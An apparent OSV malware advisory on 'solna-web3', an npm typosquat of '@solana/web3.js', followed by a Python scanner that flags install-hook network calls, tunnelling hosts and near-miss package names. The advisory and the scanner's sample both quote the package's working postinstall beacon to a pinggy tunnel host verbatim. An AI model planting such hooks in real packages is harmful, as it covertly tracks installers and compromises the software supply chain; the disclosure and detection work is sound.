solna-web3 @1.5.98
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID: MAL-2026-4248
Ecosystem: npm
Summary
Package name 'solna-web3' is a one-character typosquat of the popular '@solana/web3.js' (it drops the 'a' from 'solana'). The package's only real functionality lives in a postinstall hook: package.json declares "postinstall": "node -e '(async()=>{try{await require(\"https\").get(\"rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry\")}catch(e){}})()'", which performs an HTTPS GET to a pinggy-free.link tunneling subdomain on every npm install. Pinggy is an anonymous, ephemeral tunneling service unrelated to npm or Solana; the path /npm/-/binary/telemetry is cover-story styling that mimics npm registry paths. Errors are silently swallowed. The request leaks the installer's IP address, timing, and install count to attacker-controlled infrastructure with no opt-in. The advertised API surface (index.js exports a single trivial getProgram() that logs and shells out to solana --version) is a stub designed to make the package look real; the real behavior is the beacon. The combination of a typosquat of a top-100 package, postinstall exfiltration to an anonymous tunneling host, and a decoy API is an unambiguous supply-chain attack shape.
Source: amazon-inspector (6076f4236301f997d420c7daba9b12c035fe2866fa9fa42f59be230b5e90350a)
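A defender-side check for the two signals the report combines (an install hook that reaches the network and points at an ephemeral tunnelling host, and a package name one edit away from a popular one), added here as an example and not part of the OSV record or of any scanner's code. The sample package.json is constructed from the hook quoted above; the tunnel-service watch-list and the popular-package list are assumptions.

```python
import json
import re

# Constructed sample package.json, modelled on the postinstall hook quoted in the report.
SAMPLE_PACKAGE_JSON = r"""{
  "name": "solna-web3",
  "scripts": {
    "postinstall": "node -e '(async()=>{try{await require(\"https\").get(\"rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry\")}catch(e){}})()'"
  }
}"""

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed watch-list of ephemeral tunnelling services (pinggy is the one named in the report).
TUNNEL_HINTS = ("pinggy", "ngrok", "trycloudflare", "localtunnel", "serveo")
NETWORK_RE = re.compile(r"""require\(["']https?["']\)|\bfetch\(|\bcurl\b|\bwget\b""")
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
# Assumed list of popular packages to compare names against for typosquats.
POPULAR = ("@solana/web3.js", "express", "lodash")

def normalize(name: str) -> str:
    """Reduce an npm name to a comparable stem: drop the scope marker and '.js', map '/' to '-'."""
    return name.lower().lstrip("@").replace("/", "-").removesuffix(".js")

def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance using a rolling-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def audit(package_json: str) -> list[str]:
    """Return human-readable findings for one package.json document (empty list if clean)."""
    pkg = json.loads(package_json)
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = pkg.get("scripts", {}).get(hook, "")
        if NETWORK_RE.search(script):
            findings.append(f"{hook}: network call in install hook")
        for host in HOST_RE.findall(script):
            if any(hint in host.lower() for hint in TUNNEL_HINTS):
                findings.append(f"{hook}: contacts tunnelling host {host}")
    stem = normalize(pkg.get("name", ""))
    for popular in POPULAR:
        if stem != normalize(popular) and edit_distance(stem, normalize(popular)) <= 1:
            findings.append(f"name: '{pkg['name']}' is within one edit of '{popular}'")
    return findings
```

Calling audit(SAMPLE_PACKAGE_JSON) yields three findings: the network call in the postinstall hook, the pinggy-free.link host it contacts, and the one-edit proximity of the name to '@solana/web3.js'.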